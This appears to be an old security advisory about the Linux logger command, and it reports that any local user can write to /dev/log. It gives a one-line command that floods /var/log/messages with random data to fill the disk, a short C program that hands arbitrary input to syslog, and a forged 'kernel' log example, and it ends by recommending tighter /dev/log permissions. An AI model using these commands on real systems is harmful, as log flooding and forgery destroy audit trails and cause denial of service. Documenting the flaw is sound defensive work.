COMMAND

    logger

SYSTEMS AFFECTED

    Linux

PROBLEM

    Vitaly McLain found the following.  On Linux boxes, normal users
    have a great deal of access to /var/log/messages via "logger".
    Any user can do:

        cat /dev/urandom | logger &

    A couple of those will make "messages" look corrupted and fill up
    your hard drive.  The worst part is lines like:

        Aug 21 12:42:10 bizkit logger: I^[Ö)~z¼v*^Wf^D
        Aug 21 12:42:10 bizkit logger: ^]"Àµ_®ý¼P^S¯,´yäOsñѾ+^_^B÷tL3#­^WmÓnåbÜ^OÝ

    Couldn't  "logger"  at  least  log  which  user sent this input to
    logger?  It'd be nice, otherwise it'd be hard to track down.

    This  was  tested  under  Slackware  7.0 with stock 2.2.13 kernel.
    Here is some info:

        bizkit:~$ ls -al /dev/urandom
        crw-r--r--   1 root     root       1,   9 Dec 11  1995 /dev/urandom
        bizkit:~$ ls -al `which logger`
        -rwxr-xr-x   1 root     bin          8228 Aug  1  1999 /usr/bin/logger*
        bizkit:~$ uname -a
        Linux bizkit 2.2.13 #61 Wed Oct 20 19:40:54 CDT 1999 i586 unknown
        bizkit:~$

    This works on RedHat 6.2 and 6.1 as well.

    Any user could also do:

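        #include <syslog.h>
        #include <unistd.h>

        int main(void)
        {
            char buf[1000];
            ssize_t n;

            /* Read up to 999 bytes from stdin and NUL-terminate them. */
            n = read(0, buf, sizeof(buf) - 1);
            if (n < 0)
                return 1;
            buf[n] = '\0';

            /* Any unprivileged process can hand this to syslogd via /dev/log. */
            openlog("foobar", 0, LOG_USER);
            syslog(LOG_NOTICE, "%s", buf);
            closelog();
            return 0;
        }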

SOLUTION

    On Linux boxes, /dev/log has 0666 permissions.  As a result, you
    can not only forge messages (logger -p 0 -t kernel "blah"), but
    also forge the date.  Smart people change these permissions to
    something more restrictive.

    Most likely the kernel developers wanted any application to be
    able to log messages.  Note that the logger application isn't
    suid, so applying a fix in /usr/bin/logger is pretty much
    pointless on any setup with a compiler or wget.